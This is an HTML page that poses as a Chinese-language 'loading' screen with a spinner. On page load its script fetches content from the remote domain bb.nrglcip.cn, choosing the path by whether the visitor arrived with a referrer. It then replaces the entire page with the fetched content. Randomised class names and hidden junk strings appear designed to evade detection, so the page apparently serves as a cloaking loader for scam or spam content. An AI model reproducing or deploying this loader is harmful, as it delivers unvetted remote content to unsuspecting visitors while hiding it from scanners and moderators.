<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .R1Yhbtwl {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .R1Yhbtwl .BdME8h7krks {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .R1Yhbtwl .content {
            line-height: 50px;
            text-align: center
        }

        .R1Yhbtwl .img {
            width: 100%
        }

        .R1Yhbtwl .ENdl1X9GpD {
            text-align: center
        }

        .R1Yhbtwl .ENdl1X9GpD span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .R1Yhbtwl .ENdl1X9GpD span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .R1Yhbtwl .ENdl1X9GpD span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .R1Yhbtwl .ENdl1X9GpD span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .R1Yhbtwl .ENdl1X9GpD span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .R1Yhbtwl .ENdl1X9GpD span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .R1Yhbtwl .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function cfcH2NMjFL(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var py8hp = cfcH2NMjFL('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ py8hp +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ py8hp +".html?a=share";
		}
		
        lbwgEtf=url+"#"+new Date().getTime();
        lbwgEtf && function() {
            $.get(lbwgEtf, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<a  href='#' style='display:none'>AZ9oBudPWumXnCPiVVriTDQBmAbO2Zpy2YUmHARPFWGtqqRFnTl0DOVxLxsLUFF</a>
<li style='display:none' >wMGbMfLeVUDTew90uJd1A2kyHJmgE4pMhZEHcVWwlS4U36Th058LNnSruEDqskgJd1DKR1vFyZBKxuPqhpSW</li>
<img  src='' style='display:none'>
<h1 style='display:none' >AF8q8xps5e41JIsm9BaXCdt9TLRruOuQEUFZWXB71dfHM35b7rLADx5nSDEIudFUHZ2YRC4VOBQ</h1><div class="R1Yhbtwl">
    <div class="BdME8h7krks">
        <div class="ENdl1X9GpD">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<img  src='' style='display:none'>
<ul style='display:none' >CItlrl9dQsP2OfjbWJtQDLjOoHu023GfsgX</ul>
<h1 style='display:none' >DHGSoQ127Tx0YsntCsZDiSaXPCkjdx16RRP5XLAR9THBi</h1>
<img  src='' style='display:none'>
<div style='display:none'>fMQQjJXd2BUVrT2lDN8HRFpEhbNMGTAJdG4r</div>
<a  href='#' style='display:none'>B3WlVogg8BzGEvLGJwXjMbEfLdutBj0kSHUEQIoJdet7Ygg2V1OLSWg8Xboptus44mv</a>
<img  src='' style='display:none'>
<ul style='display:none' >CItlrl9dQsP2OfjbWJtQDLjOoHu023GfsgX</ul></body>
</html>